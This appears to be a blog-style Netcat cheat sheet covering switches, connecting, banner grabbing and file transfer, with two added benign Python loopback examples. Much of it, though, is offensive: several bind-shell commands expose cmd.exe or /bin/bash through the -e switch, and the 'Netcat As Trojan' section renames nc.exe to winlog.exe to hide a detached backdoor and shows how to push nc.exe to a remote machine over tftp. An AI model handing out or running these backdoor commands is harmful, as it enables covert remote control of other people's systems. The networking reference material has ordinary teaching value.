In This Article We'll Discuss Netcat Commands & Their Use
These are just some Netcat commands, shown to illustrate the power and versatility of Netcat.
Okay So Let's Start.
Important Switches
- -d Detach from console, stealth mode
- -e prog Inbound program to exec [dangerous!!]
- -g Source-routing hop point[s], up to 8
- -G num Source-routing pointer: 4, 8, 12, ...
- -i secs Delay interval for lines sent, ports scanned
- -l Listen mode, for inbound connects
- -L Listen harder, re-listen on socket close
- -n Numeric-only IP addresses, no DNS
- -o file Hex dump of traffic
- -p port Local port number
- -r Randomize local and remote ports
- -s addr Local source address
- -t Answer TELNET negotiation
- -u UDP mode
- -v Verbose [use twice to be more verbose]
- -w secs Timeout for connects and final net reads
- -z Zero-I/O mode [used for scanning]
Netcat Connecting
Run nc in connect mode and connect to port 139:
nc -p 31337 127.0.0.1 139
Run nc in connect mode and connect to port 139 with verbose display (giving -v twice makes it more verbose):
nc -v -v -p 31337 127.0.0.1 139
Run nc in connect mode and connect to port 139 with the timeout set to 5 seconds:
nc -w 5 -p 31337 127.0.0.1 139
Run nc in connect mode and connect to port 139 with the timeout set to 5 seconds and verbose display:
nc -v -v -w 5 -p 31337 127.0.0.1 139
Netcat Execute
-e executes a program, if netcat was compiled with -DGAPING_SECURITY_HOLE.
nc.exe is compiled with it, so -e works there.
Example:
nc -l -d -p 10000 -e cmd.exe
or
nc -L -d -p 10000 -e cmd.exe
This will run nc in detached mode, listening on port 10000.
Netcat Listen
Use the -L switch to re-listen after the socket closes, so you can reconnect to the same Netcat session.
This way you can connect over and over to the same Netcat process.
Example:
nc -l -p 53 -t -e cmd.exe
nc -l -p 5050 | /bin/bash
nc -v -l -p 5050 -e '/bin/bash'
Netcat File Sending
To receive a file named newfile on the destination system start Netcat with the following command:
nc -l -p 1234 > newfile
On the source system send a file named newfile to the destination system with the following command:
nc destinationIP 1234 < newfile
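The two commands above are a raw byte stream with nothing on top: the receiver just reads until the sender closes the socket, and neither side learns whether the file arrived whole. The following Python script is an added example (not code from the original post) that re-creates that receiver/sender pair over 127.0.0.1 so it runs offline, and then compares SHA-256 digests on both ends, which is the check a practitioner would want after any nc-style transfer. The sample payload and the port chosen by the OS are constructed for the demonstration.

```python
"""Added example (not from the original post): a Python re-creation of the
Netcat file transfer shown above, run over loopback so it works offline.

  receiver:  nc -l -p 1234 > newfile
  sender:    nc destinationIP 1234 < newfile

Like nc, the sender streams raw bytes and the receiver reads until the peer
closes the socket; nothing in the stream says whether the file arrived whole,
so the transfer is followed by a SHA-256 comparison on both ends.
"""
import hashlib
import socket
import threading


def sha256_hex(data: bytes) -> str:
    """Hex digest used to compare the sent and received bytes."""
    return hashlib.sha256(data).hexdigest()


def receive_file(listen_sock: socket.socket) -> bytes:
    """Equivalent of 'nc -l -p PORT > newfile': accept one connection and
    read until the sender closes it (EOF), returning everything received."""
    conn, _ = listen_sock.accept()
    chunks = []
    with conn:
        while True:
            chunk = conn.recv(65536)
            if not chunk:          # empty read == peer closed == end of file
                break
            chunks.append(chunk)
    return b"".join(chunks)


def send_file(host: str, port: int, data: bytes) -> None:
    """Equivalent of 'nc HOST PORT < newfile': connect, stream the bytes,
    then close the sending side so the receiver sees EOF."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(data)
        s.shutdown(socket.SHUT_WR)


def transfer_over_loopback(data: bytes) -> dict:
    """Run receiver and sender against each other on 127.0.0.1 and report
    whether the received bytes match the sent ones."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    result = {}

    def receiver():
        result["received"] = receive_file(listener)

    t = threading.Thread(target=receiver)
    t.start()
    send_file("127.0.0.1", port, data)
    t.join(timeout=10)
    listener.close()

    received = result.get("received", b"")
    return {
        "bytes_sent": len(data),
        "bytes_received": len(received),
        "sent_sha256": sha256_hex(data),
        "received_sha256": sha256_hex(received),
        "intact": sha256_hex(data) == sha256_hex(received),
    }


if __name__ == "__main__":
    # Constructed sample payload standing in for 'newfile'.
    sample = b"constructed sample file contents\n" * 2000
    report = transfer_over_loopback(sample)
    for key, value in report.items():
        print(f"{key}: {value}")
```

With real nc you get the same check by running a hashing tool (for example sha256sum) on newfile at both ends and comparing the output; the transfer itself is unauthenticated and unencrypted, so the digest only tells you the bytes match, not who sent them.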
Netcat Banner Grabbing
nc -vvn hostIP 80
nc -vvn hostIP 8080
Once connected, type HEAD / HTTP/1.0 and hit Enter twice.
nc -v www.website.com 80 < get.txt
Checking the web header.
Your get.txt file will contain:
GET / HTTP/1.0
[Carriage return] (just hit Enter in your text editor)
[Carriage return]
In Perl you can use: print $socket "GET / HTTP/1.0\n\n";
echo "blahblahblah" | nc hostIP 80 > default.htm
cat get.txt | nc hostIP 80
Netcat Web Banner Grabber
First File is a text file:
----- begin get.txt -----
GET / HTTP/1.0
HIT ENTER IN YOUR EDITOR
HIT ENTER IN YOUR EDITOR
----- end get.txt -----
The second file is a batch file:
----- begin getweb.cmd -----
@echo off
nc -v %1 80 < get.txt > index.txt
notepad index.txt
----- end getweb.cmd -----
You run it like this: getweb.cmd www.anyweb.com
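What get.txt and the getweb.cmd wrapper put on the wire is a single HTTP/1.0 request line followed by an empty line, and what comes back is the status line plus response headers (the Server header is the "banner"). The script below is an added example (not code from the original post) that shows both sides of that exchange in Python: a constructed stand-in web server bound to 127.0.0.1 whose reply headers are made up for the demonstration, and a client that does exactly what "nc -v hostIP 80 < get.txt" does, then parses the status line and headers. It covers both the interactive HEAD / HTTP/1.0 section and the get.txt/getweb.cmd section above.

```python
"""Added example (not from the original post): the HEAD / HTTP/1.0 exchange
from the banner-grabbing sections, re-created in Python so it runs offline.

Client side mirrors:   nc -v hostIP 80 < get.txt
Server side is a constructed stand-in for the remote web server, bound to
127.0.0.1, so the reply headers below are invented for the demonstration.
"""
import socket
import threading

# What get.txt / 'HEAD / HTTP/1.0 [Enter][Enter]' puts on the wire:
# the request line followed by an empty line that ends the header block.
HEAD_REQUEST = b"HEAD / HTTP/1.0\r\n\r\n"

# Constructed banner the toy server returns (assumed values, not a real host).
FAKE_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: ConstructedTestServer/1.0\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def serve_one(listen_sock: socket.socket, response: bytes) -> bytes:
    """Accept one client, read its request up to the blank line, answer with
    the canned response and close (HTTP/1.0: one request per connection)."""
    conn, _ = listen_sock.accept()
    with conn:
        request = b""
        while b"\r\n\r\n" not in request and b"\n\n" not in request:
            chunk = conn.recv(4096)
            if not chunk:
                break
            request += chunk
        conn.sendall(response)
    return request


def grab_banner(host: str, port: int, request: bytes = HEAD_REQUEST,
                timeout: float = 5.0) -> bytes:
    """Connect, send the request, and read until the server closes the
    connection, which is what 'nc host 80 < get.txt' does."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:          # server closed: HTTP/1.0 response complete
                break
            data += chunk
    return data


def parse_headers(raw: bytes) -> dict:
    """Split a raw HTTP response into its status line and a header dict
    (header names lower-cased, values stripped)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"status": lines[0], "headers": headers}


def banner_over_loopback() -> dict:
    """Start the toy server, grab its banner, and return the parsed result
    together with the request bytes the server actually saw."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    seen = {}

    def server():
        seen["request"] = serve_one(listener, FAKE_RESPONSE)

    t = threading.Thread(target=server)
    t.start()
    raw = grab_banner("127.0.0.1", port)
    t.join(timeout=10)
    listener.close()
    parsed = parse_headers(raw)
    parsed["request_seen_by_server"] = seen.get("request", b"")
    return parsed


if __name__ == "__main__":
    result = banner_over_loopback()
    print("request seen by server:", result["request_seen_by_server"])
    print("status line:", result["status"])
    print("server header:", result["headers"].get("server"))
```

The same parse_headers function works on the index.txt that getweb.cmd writes, since that file is just the raw response bytes; a server that strips or generalises its Server header is the corresponding mitigation on the other side.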
Netcat Finger & Telnet
Netcat as a simple finger client:
nc -v hostIP 79 < user.txt
The file "user.txt" contains the username you are interested in.
You can also send the output to a log file.
nc -v hostIP 79 < user.txt > log.txt
Run nc in listen mode and answer Telnet negotiation in detached mode.
nc -v -v -L -d 127.0.0.1 -p 23
Netcat Simple Server
To create a simple server
nc -l -p 1234 < file
A very simple web server
nc -L -d -p 80 < file
A simple telnet server with execution
nc -L -d -p 23 -t -e cmd.exe
Netcat As Trojan
We will use the -t switch to answer telnet negotiation. Netcat should be compiled with the -DTELNET parameter.
nc -l -d -t -p 10000 -e cmd.exe
and/or
nc -L -d -t -p 10000 -e cmd.exe
winlog.exe -L -d -p 139 -t -e cmd.exe
(note: winlog.exe is nc.exe renamed)
Connect to your trojan using:
nc -vvn IP_address_of_target port
nc -l -p 53 -t -e cmd.exe Netcat listening on port 53.
nc -l -p 23 -t -e cmd.exe Netcat listening on port 23.
To send netcat to a remote box using tftp:
tftp -i remoteip GET nc.exe